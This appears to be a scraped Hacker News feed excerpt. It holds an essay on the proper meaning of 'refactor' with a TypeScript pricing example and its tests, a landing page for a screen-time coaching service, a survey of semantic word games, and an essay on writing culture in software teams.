    “I’ll need to refactor some of these components to support your new use cases.” This was a benign, workaday statement using common jargon for software engineers, yet I could tell it struck fear in this client. I never had a chance after that.

    I don’t know when it happened, but “refactor” became a scary word, and we need to get it back.

    Why is it a scary word?

    I have no research to back up what I’m about to claim, but my suspicion is that people recoil at the word “refactor” because it’s caused them trauma, primarily in the way of costs.

    I think somehow it has become an ambiguous term in the industry roughly meaning “large, time-consuming, and potentially dangerous changes to code.” I find this deeply upsetting as it’s essentially the opposite of what the word means, which I will discuss shortly.

    Without adherence to a strict definition, I imagine there have been many instances where an engineer mentioned “we need to refactor this” to a manager, and next thing you know, the roadmap ends up derailed, or the project is a failure, or even worse, the company goes out of business.

    These outcomes shouldn’t be the result of refactoring, and we should really get on the same page about the word to avoid this from happening.

    What does the word actually mean?

    When I use the word “refactor” or “refactoring”, I mean these two specific definitions that come from the book “Refactoring” by Martin Fowler:

    • Refactoring (noun): a change made to the internal structure of software to make it easier to understand and cheaper to modify without changing its observable behavior.
    • Refactoring (verb): to restructure software by applying a series of refactorings without changing its observable behavior.

    The key part of the definition here is “without changing observable behavior”.

    If you are refactoring, it does not mean rewriting the code from scratch. It does not mean making some changes while adding new features. It doesn’t even mean changing the structure and hoping it’s the same. It means changing the structure of the code knowing it’s the same.

    There should be no equivocation about this.

    Implications of the proper definition

    The only way to make changes while knowing the observable behavior hasn’t changed is to have a testing suite that can confirm or deny this. Honestly, if you’ve avoided writing tests in your career, you’re doing yourself a disservice. Coding is one of the few industries where we can cheaply and easily verify our work is correct. All it takes is writing a few lines of code. Imagine doing something similar in the physical world, where testing might cost just as much as the actual implementation.

    Extrapolating from this, if we must keep the tests green as we make our changes, I think it suggests two things:

    • The changes we make should be small, incremental steps to our goal

    We should be able to make each change to our code in an understandable fashion. The way we accomplish big changes is through the composition of many small ones. With each small change, we should keep the tests green.

    • These small changes reveal algorithmic patterns, aka refactorings, that are repeatable

    We can define what are essentially “recipes” for restructuring code, and for those keen on reading the book, they provide over 60 of them to get started. There are more that can be defined as well.

    This means that when we’re doing a refactoring properly, we should be doing the following:

    • Tests related to the code we are changing should be running in a watch mode
    • We should be able to make an atomic commit with each step

    An example

    I’m going to make a rudimentary example to demonstrate how we might refactor a function, without changing it’s behavior, that will make it much easier to enhance in the future.

    Here we have a getTicketPrice function. It receives a Show as an argument. Members get a 15% discount on ticket prices, while non-members pay the full price. Our function looks like this:

    type Show = {
      name: string
      /**
       * The price in cents. Typically it's better to store money as an object, but
       * here we'll make the assumption we're working with US currency.
       */
      price: number
    }
    
    function getTicketPrice(show: Show, isMember: boolean) {
      return isMember ? show.price * 0.85 : show.price
    }

    The tests for a function like this are fairly straightforward. I’ll write them in a style that’s compatible with Vitest or Jest:

    describe('getTicketPrice', () => {
      const show: Show = {
        name: 'Test show',
        price: 1000,
      }
    
      it('should give members a 15% discount', () => {
        expect(getTicketPrice(show, true)).toEqual(850)
      })
    
      it('should give non-members the full price', () => {
        expect(getTicketPrice(show, false)).toEqual(1000)
      })
    })

    Running our tests shows that they’re working.

    Two passing tests

    Let’s say we learn that we now offer different levels of memberships. A member might be a basic member or a premium one. Members of premium status will get an even greater discount of 25%. What does this mean for our function?

    The first obvious thing we’ll need to refactor is the isMember boolean. Simply put, we won’t be able to represent three possible membership levels with a boolean. I haven’t come across a name for the refactoring we’ll do, but I think Boolean to Variant might be a good one. As we make this change, remember we’re trying to keep the same observable behavior.

    type Show = {
      name: string
      price: number
    }
    
    // We'll add a membership type and represent our two current states
    type Membership = 'member' | 'non-member'
    
    // We'll use that type instead of the boolean
    function getTicketPrice(show: Show, membership: Membership) {
      // We'll update our implementation to use our membership instead
      switch (membership) {
        case 'member':
          return show.price * 0.85
        case 'non-member':
          return show.price
      }
    }

    We’ll need to make a small change to our tests, but we’ll see that they continue to pass. An added benefit is we removed a flag argument in the process:

    describe('getTicketPrice', () => {
      const show: Show = {
        name: 'Test show',
        price: 1000,
      }
    
      it('should give members a 15% discount', () => {
        expect(getTicketPrice(show, 'member')).toEqual(850)
      })
    
      it('should give non-members the full price', () => {
        expect(getTicketPrice(show, 'non-member')).toEqual(1000)
      })
    })

    Are tests are still green with that change. I won’t share a picture, it’s exactly the same as before.

    That said, I think we’re at a place we can add our new feature. Given the nature of this function, we can write the additional test first, then get it passing:

    it('should give premium members a 25% discount', () => {
      expect(getTicketPrice(show, 'premium')).toEqual(750)
    })

    Our test fails, so let’s get it passing. To do so, we’ll add a premium variant to Membership and account for it in our function:

    type Show = {
      name: string
      price: number
    }
    
    type Membership = 'member' | 'non-member' | 'premium'
    
    function getTicketPrice(show: Show, membership: Membership) {
      switch (membership) {
        case 'premium':
          return show.price * 0.75
        case 'member':
          return show.price * 0.85
        case 'non-member':
          return show.price
      }
    }

    And our tests are passing again.

    Three passing tests

    There might be more that we can do to this function. We could even argue a bit about the best way to do its implementation, but hopefully it gave you some insight into the process of changing code with safe refactorings.

    Final thoughts

    We need to reclaim “refactor” because this process of restructure, verify, add feature, verify is simply just doing the job. I don’t want to have to use euphimisms to describe my work just so managers don’t freak out when changes are necessary. I think if refactors remain scary, then we actually make our work more dangerous for ourselves. Avoiding making changes only makes the code more complex and likely more error prone as well.

    If we can embrace refactoring as a safe, atomic way to change code and recognize that it’s just a part of the day to day work, I think we can drop the stigma and start improving the codebases we work in.

    ]]>
    https://kyleshevlin.com/refactor-is-not-a-scary-word/ hacker-news-small-sites-43208663 Fri, 28 Feb 2025 18:17:01 GMT
    <![CDATA[Show HN: I built a 1:1 coaching service to reduce my screen time]]> thread link) | @roddylindsay
    February 28, 2025 | https://www.zabit.com/screen-time | archive.org

    screen time

    • A partner for your app usage

      Work with your coach to set achievable goals and get personal guidance

    • Integrated with your phone

      Set time limits and block apps automatically with Zabit App Tracking for iPhone

    • Stop ignoring your limits

      Your coach is notified every time you exceed your limit, increasing adherence through accountability

    Finally, swap the scroll for a positive habit

    Category image

    Fitness

    • Work out more often
    • Walk 10,000 steps every day

    Category image

    Lifestyle

    • Read more books
    • Meditate every day

    Category image

    Hobbies

    • Learn a new language
    • Cook ambitious meals

    Category image

    Health

    • Get to bed earlier
    • Cut down on snacking

    Category image

    Parenting

    • Work on a hobby together every week
    • More screen-free time with the kids

    Category image

    Friends & Family

    • Call your loved ones
    • Spend time with friends

    Meet our
    Coaches

    Zabit coaches are psychologists, wellness professionals, and advanced clinical psychology students.

    Mica's profile photo

    Mica

    Nutritionist and wellness expert with 5 years of experience helping clients with lifestyle changes.

    NutritionFitnessScreen Time

    Clara's profile photo

    Clara

    Fourth year clinical psychology student, invested in helping clients build healthy habits.

    HealthOrganizationNutrition

    Rosario's profile photo

    Rosario

    Fourth year clinical psychology student, loves helping others achieve their goals!

    SleepLifestyleSubstances

    Q: Who is Zabit for?

    A: Zabit is for people who just need a bit of accountability for everyday habits.

    Therapy

    Life Coaching

    Personal Training

    Zabit Coaching

    Best for...Mental HealthLife goalsWorkoutsEveryday Habits
    Personalized 1:1 Support
    Daily Reminders
    Daily Accountability
    App-Based Tracking
    Cost

    $100+/ week

    $100+/ week

    $75+/ week

    $8.99/ week

    ]]>
    https://www.zabit.com/screen-time hacker-news-small-sites-43208445 Fri, 28 Feb 2025 17:54:40 GMT
    <![CDATA[Show HN: Semantic Games – Word games based on meaning instead of spelling]]> thread link) | @michaeld123
    February 28, 2025 | https://www.inotherwords.app/semantic-games/ | archive.org

    Put away your Scrabble tiles. Explore connections, find pathways, and recognize patterns across meaning instead of spelling. A sub-genre of word puzzles exists where semantic relationships take center stage. Unlike traditional word games focused on letter arrangements, these challenges invite players to navigate networks of meaning that give language its richness. These idea-linking puzzles harness how concepts connect through chains of association.


    Synonym Chains

    Historical

    Synonym chains represent the earliest formal exploration of semantic networks in game form. Popularized by Dmitri Borgmann in his 1967 book "Beyond Language," he demonstrated that seemingly opposite words could connect through carefully constructed synonym chains. Borgmann's famous example transformed "black" into "white" through a sequence of small semantic shifts, as shown in the second image.

    These puzzles reveal meaning's gradient nature and identify key semantic pivot points. In Borgmann's examples, critical junctures occur when "concealed" (negative) connects to "snug" (positive) and when "insolent" (negative) links to "proud" (positive). This led Borgmann to conclude that "any word whatsoever may be converted into its opposite" through such chains.

    In 1987, computer scientist Ron Hardin at Bell Telephone Laboratories pioneered computational approaches using The New Collins Thesaurus. His work generated thousands of examples, demonstrating how virtually any word could transform into its opposite through 4-7 synonym steps.


    A British television quiz show hosted by Victoria Coren Mitchell that has developed a cult following for its exceedingly challenging puzzles. Named after an E.M. Forster quote imploring readers to "only connect," the show tests teams on finding relationships between seemingly unrelated clues.

    Its most famous round, the "Connecting Wall," directly inspired the NYT's Connections game. Teams face 16 clues that must be sorted into 4 groups of 4 with a common link—with just 2½ minutes to solve it. The connections are notoriously obscure, from literary references to wordplay (like "words that can precede 'man'"). Other rounds include finding sequences and deciphering phrases with vowels removed. Often described as "the hardest quiz on TV," Only Connect celebrates lateral thinking and the joy of discovering hidden patterns.


    A daily word categorization game published by The New York Times. From a grid of 16 words, players must sort them into four groups of four words sharing a hidden connection. The challenge lies in figuring out what those connections are—they might be straightforward themes like "dog breeds" or tricky wordplay like "words that can precede 'ball'".

    Each puzzle includes one easy category (color-coded yellow), two medium categories (green and blue), and one tricky category (purple). Players get four chances to make mistakes before the game ends. Connections became an instant hit after its 2023 release, quickly becoming the NYT's second-most popular game after Wordle.

    Two other notable 4×4 grid games exist. Red Herring (2014) predated Connections with a twist—players sort words into three categories while avoiding four unrelated "red herring" distractors. PuzzGrid (2018), inspired by Only Connect, offers thousands of user-contributed puzzles with similar mechanics but greater community involvement.


    A competitive team-based party game where "spymasters" provide one-word clues that must connect multiple target words while avoiding opponents' words. The game transforms semantic associations into strategic competition, challenging players to compress multiple concepts into a single, precise clue.

    Codenames stands out by turning word association into a social experience—where communication precision and shared cultural context become crucial gameplay elements. The core challenge lies in finding conceptual bridges that connect several words at once while avoiding misleading teammates toward opponents' words or the game-ending "assassin" word.

    The game's genius lies in exploring communication ambiguity. Every clue represents a delicate balance between breadth (covering multiple words) and precision (avoiding unintended associations). This tension creates memorable moments of triumph when teammates instantly understand a clever connection, or comedy when a seemingly clear clue is wildly misinterpreted.


    A spy-themed team game where players communicate three-digit codes to teammates using semantic clues. Each team has four fixed keywords (numbered 1-4) visible only to them. When an "Encryptor" draws a code like "3-1-4," they must create clues for those positions without revealing the actual keywords.

    The game creates tension between clarity and secrecy: obvious clues help your team decode messages but reveal your keywords to opponents, while obscure clues prevent interception but risk miscommunication. Teams track all previous clues on notepads, gradually mapping their opponents' keywords while depleting their own semantic connections.

    As rounds progress, players exhaust obvious associations and must explore creative semantic territory. Meanwhile, opponents gather enough evidence to intercept poorly disguised codes. Success depends on balancing clarity with ambiguity while working within increasingly constrained semantic options.


    A party board game published by Hasbro in 1989 where players describe a target word without using certain "taboo" words listed on the card. Players must find alternative paths to convey concepts when obvious descriptive routes are blocked.

    Unlike connection-focused semantic games, Taboo emphasizes what players cannot say. This inverts typical word association by requiring lexical avoidance rather than bridge-building, testing players' linguistic flexibility under time pressure. When primary descriptive paths are blocked, players must access alternative expressions to communicate effectively.

    Gameplay creates natural humor through these constraints. Cultural knowledge and shared references become valuable tools, as effective clues often depend on the specific group's common experiences.


    A semantic word-guessing game from 2022, when Wordle was a viral phenomenon, Semantle introduced semantic distance as a counterpoint to Wordle's letter-based feedback. It used "vectors" from Google's Word2Vec project—strings of numbers mapping words in multidimensional space. Before ChatGPT's launch, the idea that a computer could evaluate the similarity between any two words still felt somewhat mystical.

    The game earned the nickname "the Dark Souls of Wordle" for its difficulty. After each guess, players receive a similarity score (0-100) showing how semantically close their word is to the target. Word2Vec's limitations define the game—its neural network embeddings poorly classify words with multiple meanings and reveal connections that don't match human intuition, often circling players around the target word. With around 200,000 daily players at its peak, Semantle attracted an audience who endured navigating these beguiling word relationships.

    Semantle inspired several variations that attempted to remedy its core frustrations. Contexto, created by Brazilian developer Nildo Junior, gained popularity in Brazil in late 2022 with its more intuitive interface. Another variant, Pimantle, uses a 2D visualization that plots guesses relative to the target word, creating a spatial map that addresses Semantle's notorious 'blind orbiting' problem.


    A daily word-chain game where players connect two words by building a network of related terms. Imagine a start word in the bottom-left corner and an end word in the top-right corner of a blank canvas. Your challenge: add intermediate words that form semantic bridges between them, creating a continuous chain from start to finish.

    When you add a word, Linxicon uses a Sentence-BERT model to automatically connect it with any related words already on the board if their similarity exceeds 38%. You win when a complete chain forms between the start and end words. What makes Linxicon special is its visual network-building approach—you literally see the semantic web grow with each addition, and there's no single correct solution.

    Note in the screenshot that the game does not link "will" to "inheritance," perhaps because it only considers the sense of intent or desire.


    A daily puzzle where players find chains between seemingly unrelated words, like connecting "sugar" to "peace" through "sweet" and "harmony". The game combines embedding vectors with weighted graph traversal to model nuanced relationships across a vast network of 1.1M words with 60M connections.

    In Other Words transforms word association into an elegant daily challenge. Each day presents two distant words, challenging players to build a bridge between them using semantic stepping stones. The game's core insight: virtually any two English words can connect through related meanings in seven steps or fewer.

    Beyond recognizing connections, the game rewards strategic thinking about which words serve as effective bridges. Skilled players identify "conceptual hubs" that efficiently connect disparate semantic territories. The most satisfying moments come from discovering surprising associations that elegantly link seemingly unrelated concepts.


    OtherWordly

    In development

    A space-themed arcade game that reimagines word puzzles as physical challenges. Players launch words through mesmerizing fields of geometric swarms, transforming traditional word matching into spatial gameplay while navigating obstacle courses and deciphering partially hidden targets like "v**il*a".

    OtherWordly merges semantic play with arcade action, creating a unique hybrid engaging both linguistic and spatial reasoning. Players navigate vibrant cosmic environments where words become physical objects to launch, guide, and manipulate.

    What distinguishes OtherWordly is its real-time difficulty adjustment that matches each player's skill across both word puzzles and arcade challenges, ensuring a personalized experience regardless of vocabulary or gaming prowess.


    A browser-based game where you navigate from one word to another through a chain of semantically related words—like a round of golf played with concepts. The game presents two words (the tee and the hole), and your task is to find a path between them in as few steps as possible.

    At each step, Word Golf suggests possible "next hops" based on semantic associations powered by the GloVe model. For example, connecting "pilot" to "pineapple" might require a path like "pilot → ship → container → refrigerator → snack → canned → pineapple". Unlike classic word ladders that change one letter at a time, Word Golf lets you jump between related concepts, creating a game that feels like exploring a vast semantic map.


    A project combining game elements with data collection, promoted as a "massively multiplayer word association game." Players see a word, type their first association, and collectively build a crowdsourced semantic network of concepts.

    Starting with "volcano" and growing to millions of connections, it showed participants how their associations compared to others. This feedback made contributing engaging, as people discovered where their thinking aligned with the crowd.

    The project visualized these connections through a bold, animated radial tree with thick strokes and floppy motion. It revealed patterns in word association, with "sex," "me," and "money" emerging as the most frequent responses, creating a distinctive map of semantic relationships in our collective understanding of language.


    An AI-powered word association game released by Google to showcase their semantic technology. Players type a word they associate with a target word, and the AI evaluates how closely connected these concepts are in semantic space.

    The game featured two modes: a block-clearing puzzle and a list-reordering challenge. It was powered by Google's Universal Sentence Encoder, which could recognize that words like "shell" and "turtle" were semantically related—at the time, a early demonstration for AI word understanding.

    Semantris differs from most semantic games by having players attempt to match the AI's expected connections rather than explore their own associations. This created an intriguing dynamic where players needed to think not about their own word associations, but what the machine might consider most relevant.


    Advancing semantic games

    We hope this will help inspire more semantic games. Meanwhile, if you know of a related semantic game that should be in this collection? Let us know.

    ]]>
    https://www.inotherwords.app/semantic-games/ hacker-news-small-sites-43208227 Fri, 28 Feb 2025 17:36:19 GMT
    <![CDATA[Becoming a software A-Team via writing culture]]> thread link) | @ingve
    February 28, 2025 | https://www.evalapply.org/posts/writing-practices-to-10x-engineering/index.html | archive.org

    Becoming a software A-Team via writing culture

    Strong writing culture transforms merely competent software teams into elite ones; those proverbial 10x product builders. Although creating high-leverage writing culture requries mindful effort, it is not rocket science and one can start small. So... why, when, and how to do it? Personal opinions ahead. Take what is useful, discard the rest.



    "Writing is nature's way of telling you how sloppy your thinking is."

    — Richard Guindon

    • Intelligently crafted writing culture, though no silver bullet, is the only way to reliably leverage ourselves across space and time 1. Far beyond our own heads, and far into the future 2.
    • The closer one looks, the more one will notice elite performers in one's peer group. The proverbial 2x, 5x, 10x teams. Maybe even better. Invariably, they rely on strong writing culture to perform at the high level they do.
    • To successfully use writing for leverage; first, clean house. Then, start small. Think concurrency. Help one critical and busy person free up 10% of their work week.

    "Give me a fulcrum, and I shall move the world."

    — Archimedes of Syracuse

    All leverage is about finding or creating some source of asymmetric advantage. The greater the leverage, the greater the advantage, and the lower the energy expended to make things happen.

    Writing is Lever.

    Product is Fulcrum.

    Team is Force.

    Writing Product Team is A-Team.

    Word.

    "I love it when a plan comes together" - The A-Team

    A-teams write to kill complexity

    Complexity is to software what mass is to a rocket; the hard limiting factor of net-positive growth in any dimension one chooses to measure (shipping velocity, headcount, revenue, cash flow, account expansion; anything).

    David-sized product organisations succeed against Goliath-sized ones because they keep accidental complexity at bay 3. Such competitive advantage invariably flows from strong writing culture created by the Davids for their needs.

    Yet, teams of A players routinely crash and burn like "F"-Teams.

    They habitually accumulate unchecked masses of software debt, and fail to escape the terrible gravity well of accidental complexity.

    "I must not complect.
    Complexity is the mind-killer.
    Complexity is the little-death that brings obliteration.
    I will face complexity and I will permit it to pass over me and through me.
    And when it has gone past, I will turn the inner eye to see its path.
    Where the complexity has gone, there will be nothing.
    Only I will remain.
    Litany Against Complexity

    A-teams write to compound value

    They use writing to generate overlapping compounding benefits:

    • conserve personal and collective attention
    • power creativity
    • grow intellectual capital
    • maintain clear situational awareness
    • run high-trust workplaces, and
    • make high-quality decisions.

    Because they know that software is peoples' thoughts on repeat, and that complexity is the negative-compounding mind-killer.

    Yet most product teams do not invest in writing culture.

    The result?

    Their people toil on hamster wheels of endless forgetting and rework. Value creation craters. Stock dilutes relentlessly. Their true burn rate measures not in cash, but in minds wasted and bodies spent.

    Sad, but not fated.

    A-teams get lucky more, by writing pervasively

    Privately cultivated writing culture runs dark and deep, but emits plenty of heat and light visible to even the most casual of observers.

    A strong culture of writing has the (good) habit of pervading all aspects of an organisation. Everything from their marketing copy, tweets, blogs, customer support interactions, documentation, mass mailers etc. reflects their deliberately curated writing culture.

    As a proxy measure 4; a company blog that is both tasteful and routinely makes the HackerNews front page is no accident. Fortune favours a power law curve. Sure it randomly rewards the prolific brainrot TikTock because there is sometimes a quality to quantity ("Even a broken clock is right twice a day." etc. etc.), but the prolific with taste and quality, fortune rewards a lot more, a lot more reliably.

    Individuals play the game, but teams beat the odds.

    — The US Navy SEALs

    A-teams master common-sense writing

    The good news? Our kind of writing is NOT rocket science.

    It is about:

    • simple common sense writing (no literature major necessary),
    • of, by, and for the product team, empowered by
    • systematic use of information tools (be it grep, wikis, or LLMs),
    • privately within the safety of one's team,
    • such that the whole team is significantly better off,
    • even if "team" is just you, to begin with.

    Good writing is the single most undervalued talent a startup can have.

    — "How we write", Griffin (a UK banking-as-service company).

    That page is just… chef-kiss-emoji. 5

    nb. I have artificially separated out categories to illustrate many different contexts in which writing is useful. This does not mean "Vomit needless words." 6.

    Quite the opposite… I write to systematically re-use a given unit of writing in multiple contexts, with little or no tweaking. For example:

    • how/why I write high quality commit messages (below), and
    • how/why I write teaching material such that I can use the same text to deliver live demos and publish as blog posts and as slides.

    To make

    Writing as part of the source of the artifact (code or design file).

    • Naming things (functions, APIs, domain entities)
    • Documentation strings
    • In-line comments
    • Metadata etc…

    Example: outline an API as working code, with mock implementations so that we can peer-review and evolve the meaning of our code, without getting lost in implementation details. The purpose of that commit was to help me think about, and get feedback on, the shape of an HTTP API. (Told ya. It ain't rocket science.)

    To ship

    Writing that is adjacent to the artifact being produced. High quality commit messages, written code reviews, development-time notes etc…

    Example: Habitually writing model git commit messages is table stakes as far as I'm concerned, because I profit from the effort multiple times.

    • While making, writing the commit text forces my brain to switch from "execution" mode to "reflective" mode, to debug my thinking about what I just did. Subtle design errors and subtler bugs surface in this process often enough to keep me humble!
    • In code review, colleagues are rarely blocked on me to understand work-in-progress.
    • At feature shipping, they yield release notes, feature documentation, executive summaries… stuff that helps other people perform better and look good to their stakeholders, whether executive talking to board, customer success helping a new feature roll out succeed, sales to build factually accurate non-B.S. pitches etc…

    Context captured smartly on-the-fly folds into an assortment of trustworthy (with provenance) facts and explanations:

    Material for peers and colleagues that helps them reliably communicate with each other, the board / investors / customers / other outside stakeholders.

    • Executive briefings
    • Release notes etc.

    Product know-how that is essential to future decision-making about implementation details.

    Instruction material

    • Setup and usage guides (e.g. in READMEs)
    • Demos and/or instructions for demos,
    • Tutorials, onboarding programs, blog posts
    • e.g. The tutorial content and the README of clojure-by-example.

    Raw "research notes" and stream-of-conscious-y brain-dumps.

    • Create psychological safety by having a a place where everybody is allowed to be wrong, drop half-assed ideas, add secondary context / things they explored and learned about while working on features.
    • Commit this context straight into the source to keep all new context visible through code review, or dump it in a wiki (but please cross-link the page to the project's README and mention changes in code review.)

    To evolve

    All shareable content as well as original sources further inform product requirement documents, project plans, and product strategy.

    • Improve and plan better via. context-rich bug reports, post-mortems, and critiques.
    • Encourage critical thinking through rationales, concept notes, architecture diagrams, specifications
    • Help individuals grow by instutionalising knowledge in checklists and runbooks that help seniors rapidly onboard, mentor, coach juniors into independent skilled staff members.

    To de-risk

    Teams with a strong writing culture automatically de-risk themselves. They can go as far as to become a collection of buddy teams and individual contributors, cooperating with each other as needed. A lot more like specialty surgical teams than generic marching bands.

    Strategically: by cultivating a strong design culture.

    Tactically: by cultivating deep observability.

    • My favourite example again; model commit messages. Because I habitually make atomic commits and write model commit messages, colleagues have granular enough information about feature history to independently audit, debug, fact-find… for the whole life of the software. Such a history is very useful while making, but is rarely needed post-shipping. However it is needed inevitably, and when the need arises, the stakes are invariably high. Being able to inspect manually as well as trivially automate scripts using git-bisect run becomes a superpower.

    To show up

    Please, let's make visible the impact of the invisible work we do. Besides, why give up even small chances to look great to outside observers, by being able to magically produce good answers fast. Not infrequently, by literally dumping a feature's git log (or ones' running notes) into a document and cleaning it up.

    Please read Julia Evans's post Get your work recognized: write a brag document. Guess what. You can't do this unless you have a writing habit — scribble down "TIL"s and "A-ha"s and tiny wins. All these roll up into big impact. But we ourselves remain unaware because we often don't have a tangible feedback loop that we are having an impact.

    To LLM harder

    For the LLM enjoyers out there, need I even suggest the compounding value of having a (consistently high-quality) input context to (re)feed into your LLM-assisted product development?

    What might be two hours of mostly manual collation and rewording of a raw dump could become a twenty-ish minute job of mostly intelligent review and copy-editing of LLM-produced content.

    Utility is contextual 7. Use the examples as a box of tools and craft something suited to the orientation, mandate, and goals of the workplace / team / self.

    Collaboration oriented writing is the name of the game I am convinced that has directly made me a better colleague, made "us" better together, and bettered professional lives of others. Some of my best days have been people telling me, years after the fact, how much they benefited from stuff my like-minded colleagues and I wrote down and made useful "back then". My colleagues report similar experiences.

    There are no silver bullets

    Writing is unnatural, especially for teams. Heard of Bezos? Well, even someone with his smarts, charisma, and sweeping authority over his company had to work to make it work, because…

    It is a conscious choice

    We have to culture ourselves into pervasive, thoughtful, effective product development writing. As individuals. As teams. As whole org charts. LLMs may make writing life easier, but only we can do the work to make it work.

    It is not a one off activity

    Our kind of writing remains useful only through repeat use and progressive revision throughout the life of a software product. It needs leadership and community contribution to update, curate, improve, teach, use. Because bureaucratic ossification is always around the corner.

    It requires widespread buy-in

    One can't force it. Doing so will reliably cause more damage than good, by violently convincing people that it sucks, because the experience of it will in fact suck for everyone involved. If you find yourself in a leadership position in a writing-averse culture, boy do you have your work cut out. How will you save your people from the septic floodwaters of Meeting Overflow?

    It is not a mechanical template

    For example, if you try to copy Bezos and some imagined "Amazon Way", you will at best create a poor facsimile, which will only degrade over time. Just like those who tried and failed and still do, to recreate the Toyota Way. Many are seduced by the allure of their Zen-like philosophy, lofty principles, and relentless success. Few notice how deep their writing practice goes, and how central it is to the ongoing success of their Way. So draw inspiration by all means, but work intelligently with your own context.

    It will reveal -your- nature and values

    If you fear that you might create a nightmare bureaucracy of soul-sucking process documentation and inter-personnel file redirection, you may need to stop right now and do some heavy soul-searching.

    Maybe some more great points that elude my mind. But you catch the drift, yes? Ain't no silver bullet.

    Before beginning, ensure the kitchen and the toilets are clean

    10x of zero is zero. 10x of "we suck" is "we dead".

    Writing practice creates leverage only if one's house is in order; viz. the team knows how to prioritise and how to reliably ship working software. The point of 10x-ing is to radically leverage competence, without diluting radically. As any seasoned businessperson will attest, dilution is relentless, and is a steep price to pay for a stitch in time.

    "Dilution is relentless."

    — Startup founder wisdom after their first Series B.

    Decide whether it's for you and your team

    IMO, teams and leaders fitting the following profile are well-positioned to evaluate and adopt "writing as a 10-xing strategy" 8:

    • The team is small and lean, whether independent, or lurking somewhere in the shadows of a world-spanning mega-corp. And you all aspire to do more with less, without burning out.
    • Your team builds and sells software products. Software service teams who trade time for money cannot hope to 10x in equity terms. They can, however, greatly improve overall profitability.
    • Your house is in order. You are so busy shipping, you just can't spare anyone to intelligently culture writing systems that will unlock the next level of elite performance.
    • You are willing to recruit a partner in crime. You, and at least one person you all trust, know that writing practices deployed strategically are key to punching way above collective body weight, without ballooning in size.
    • You have a discretionary budget to start small today. You must hire an out-of-band coach, or someone from another team, or your own mentor to drive this change. If you want to DIY, spend money to clear your brain and calendar… hire an executive assistant, or get a competent person on loan from another team, whom you can delegate time-consuming busy work to. Your brain can't be swamped and strategic (creative / observant) at the same time.

    Make no mistake, learning to create/deploy/adapt writing culture is a process of progressive team transformation. It is a long game that needs belief and buy-in. Nobody can change your beliefs about the value of good writing culture. Only you can do that. 9

    Reason like we do for concurrency problems

    Marginally reducing pressure off a contended main thread can remarkably improve throughput of a whole system.

    Individuals are single-process doers. Teams are concurrent systems. Achieving lock-free coordination is a winning play. Good writing culture delivers that capability.

    Choose a small goal…

    A reasonable person may choose a reasonable success criterion, such as "Achieve a 10% notional 'gain of leverage' of one critical person in a team of ten, such that all ten win.".

    "Gain of leverage" shows up as less polling/waiting, more proactive unblocking, less rework, higher value work product, higher quality thinking, more autonomy and improved collaboration, and uplifting experiences of real productivity.

    Pick one in-demand person in one in-demand team.

    Re-organize to inhabit "The Zone"

    Make it so that getting into the The Zone, and staying there becomes standard, especially for you as a leader.

    Learn from the best

    I am sure my list is not comprehensive. There are more tools and ideas and techniques out there. Search, adopt, and adapt! No need to re-invent the wheel.

    Here are some resources, in no particular order, to get the brain-juices flowing:

    External peer recognition may be one of the most validating measures of all. You know your team is winning when even the skeptics and the rivals soften up and ask "How can we do what you're doing?!".

    Yet, several internal measures are perhaps more personally valuable, and worth prioritising over outside admiration.

    Your leadership potential is fully realised

    Because good writing culture ended denial of mind attacks. The more senior you are, the more risk you bear of producing outcomes. Once upon a time your mind could barely keep up with endless interruptions and streams of consciousness arriving at you from chat channels, door knocks, and shoulder taps. Seniority rarely brought satisfaction commensurate with the weight of leadership.

    Now you spend most of your time coaching, mentoring, and writing exemplary code. Now you rarely have to ask anyone for a status update, you can query a system for it. You routinely have well informed senior-level conversations with the right people, all literally on the same page.

    The sense of progress is real

    Because good writing culture ended rework. Forgetting used to be endemic. The same problems repeated with more joining the fray. Every day was groundhog day.

    Now, you are still busy, but with real work, not busy work. You still wake up at 3AM worried about something, but that is the highest value thing. Your mind and body are sweating almost exclusively because of the difficult job of making, operating, selling, scaling your product.

    Confidence of business continuity is high

    Because good writing culture ended anxiety. Once upon a time, nobody really remembered why anything was done. Bus factors were high and rising. Velocity suffered when different people kept asking the same kind of questions again and again, pulling attention away from critical path tasks. Go to market failures seemed always around the corner. Stakeholder confidence in development was low, because it was an incomprehensible magical black box to them.

    Now decision making is no longer psychologically fraught. Now, you and your team have a shared, sufficiently coherent, organisation-wide picture, from daily priorities to long term objectives. Everybody has confidence that when the unexpected happens, as it will, they have the strategic context, tactical information, and systematic situational awareness to rise to the challenge and thrive through it.

    Everyone's default work mode becomes "Deep Work"

    Because good writing culture ended meeting culture. No more nebulous "all talk, no do" meetings, no more frequent sync-ups that could be async wiki page updates, no more constant barrage of chat DMs and at-mentions.

    Now when you see two or more people in a huddle or a live chat, it is them producing tangible value; pair programming, brainstorming, teaching and learning, reviewing and reflecting, deciding significant things, fixing outages, solving real emergencies.

    Job satisfaction is high

    Because with good writing culture people help people become Better, including their own future selves, and future colleagues they will never meet.

    Once upon a time onboarding new staff was chaotic and slow. Mentoring anyone was impractical because everything was synchronous conversation. Developer outreach and marketing were distant dreams because there was nothing to begin with… you couldn't even hope to make an internal Engineering blog.

    Now staff have better tools and skills to make their work and their impact visible and legible to colleagues, decision makers, and outsiders. They derive more satisfaction from teaching each other. They are better supported in their day to day lives as knowledge workers. They have more ownership over their means of production. They tend to have higher autonomy as well as a high degree of collaboration.

    Remote work works

    Because good writing culture made asynchronous work work. See: WordPress, GitLab, 37Signals, and pretty much any well-oiled remote-first workplace.

    And guess what? With good writing culture, in-person work works even better!

    I love building software 10. I enjoy writing for it and about it. I delight in helping others do the same. Selfishly, I want the world to have more places where people like me can thrive 11.

    I've only ever worked with small obscure teams, over the last two-ish decades of professional life. Personal experience, 20/20 hindsight, and grapevine conversations have convinced me that the unreasonably effective ones had deliberately built solid cores of writing culture, for their needs. That is how they got very good at building and shipping together, succeeding through high growth and sharp downturns, all with low headcount and low attrition.

    Whether on staff or as consultant, I thrived and grew working with such teams, and narrowly avoided burning out with the others. So have many friends and colleagues.

    I have also had the opportunity and privilege to help build, sustain, and exemplify collaborative writing culture at those high-functioning places. I had the base and conviction to do so because, luckily, writing became core to my process early in my work life.

    Will it surprise you to know that I dearly want the world to have many more such high-functioning teams, where people like me can thrive?

    ]]>
    https://www.evalapply.org/posts/writing-practices-to-10x-engineering/index.html hacker-news-small-sites-43208220 Fri, 28 Feb 2025 17:35:41 GMT
    <![CDATA[The First Hit Is Free]]> thread link) | @grork
    February 28, 2025 | https://www.codevoid.net/ruminations/2025/02/23/the-first-hit-is-free.html | archive.org

    23rd February 2025, three minutes to read

